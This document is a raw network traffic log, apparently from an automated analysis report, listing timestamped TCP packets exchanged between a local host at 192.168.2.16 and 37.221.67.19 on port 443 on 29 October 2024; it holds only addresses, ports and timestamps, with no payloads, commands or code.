                                                                                                                                                                              Oct 29, 2024 19:34:58.030693054 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.030846119 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.030855894 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.030945063 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.140366077 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.140436888 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.140525103 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.140551090 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.140579939 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.140594959 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.143939018 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.143990993 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.144047022 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.144062996 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.144093037 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.144110918 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.148273945 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.148328066 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.148386955 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.148406982 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.148438931 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.148462057 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.258125067 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.258193016 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.258271933 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.258304119 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.258335114 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.258356094 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.262011051 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.262079000 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.262114048 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.262135983 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.262159109 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.262185097 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.265043020 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.265113115 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.265132904 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.265147924 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.265170097 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.265188932 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.375236034 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.375292063 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.375343084 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.375375032 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.375391960 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.375416040 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.378711939 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.378763914 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.378799915 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.378815889 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.378834009 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.378855944 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.381386042 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.381433964 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.381475925 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.381491899 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.381514072 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.381532907 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.492532969 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.492599964 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.492685080 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.492713928 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.492765903 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.492795944 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.495580912 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.495628119 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.495687008 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.495708942 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.495738983 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.495770931 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.498533964 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.498583078 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.498627901 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.498647928 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.498668909 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.498687029 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.609184027 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.609216928 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.609314919 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.609344006 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.609392881 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.612041950 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.612066984 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.612145901 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.612159967 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.612205982 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.614679098 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.614706039 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.614793062 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.614815950 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.614866018 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.618232965 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.618262053 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.618326902 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.618340015 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.618381023 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.727440119 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.727469921 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.727623940 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.727648020 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.727698088 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.730775118 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.730794907 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.730859041 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.730865002 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.730906010 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.734462976 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.734484911 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.734566927 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.734591961 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.734642982 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.736428976 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.736449957 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.736511946 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.736529112 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.736581087 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.846143961 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.846173048 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.846362114 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.846391916 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.846440077 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.848704100 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.848721027 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.848858118 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.848881006 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.848936081 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.852787018 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.852806091 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.852875948 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.852885008 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.852922916 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.960678101 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.960710049 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.960833073 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.960861921 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.960915089 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.964670897 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.964692116 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.964772940 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.964782000 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.964826107 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.966360092 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.966382027 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.966442108 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.966448069 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.966494083 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.970079899 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.970114946 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.970168114 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.970175028 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.970205069 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.970220089 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.077858925 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.077899933 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.077997923 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.078021049 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.078036070 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.078069925 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.081427097 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.081454039 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.081525087 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.081549883 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.081602097 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.083599091 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.083616972 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.083679914 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.083688021 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.083738089 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.086965084 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.086982012 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.087053061 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.087059975 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.087105989 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.197762012 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.197796106 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.197906017 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.197931051 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.197974920 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.199687958 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.199708939 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.199770927 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.199783087 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.199800014 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.199817896 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.202092886 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.202112913 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.202186108 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.202200890 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.202245951 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.203954935 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.203974962 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.204035997 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.204046965 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.204094887 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.205708981 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.205728054 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.205792904 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.205802917 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.205841064 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.316289902 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.316315889 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.316386938 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.316404104 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.316457033 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.317883015 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.317902088 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.317960024 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.317967892 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.318006992 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.320372105 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.320391893 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.320449114 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.320461035 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.320506096 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.321551085 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.321568966 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.321624994 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.321630955 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.321671009 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.431989908 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.432018995 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.432110071 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.432147026 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.432193041 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.434020996 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.434041023 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.434097052 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.434103966 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.434129000 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.434153080 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.434993029 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.435012102 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.435075045 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.435085058 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.435136080 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.438155890 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.438174963 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.438257933 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.438265085 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.438313007 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.439233065 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.439264059 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.439307928 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.439320087 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.439336061 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.439374924 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.549511909 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.549587011 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.549670935 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.549702883 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.549720049 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.549760103 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.551728964 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.551803112 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.551822901 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.551831007 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.551858902 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.551881075 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.553023100 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.553067923 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.553102016 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.553107977 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.553132057 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.553148031 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.555579901 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.555641890 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.555671930 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.555679083 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.555716991 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.555716991 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.556627035 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.556674004 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.556709051 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.556714058 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.556734085 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.556763887 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.666380882 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.666414022 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.666625977 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.666651011 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.666724920 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.668762922 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.668783903 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.668870926 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.668883085 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.668926001 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.670187950 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.670216084 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.670279026 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.670290947 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.670332909 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:59.672512054 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.672530890 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:59.672590017 CET49729443192.168.2.1637.221.67.19
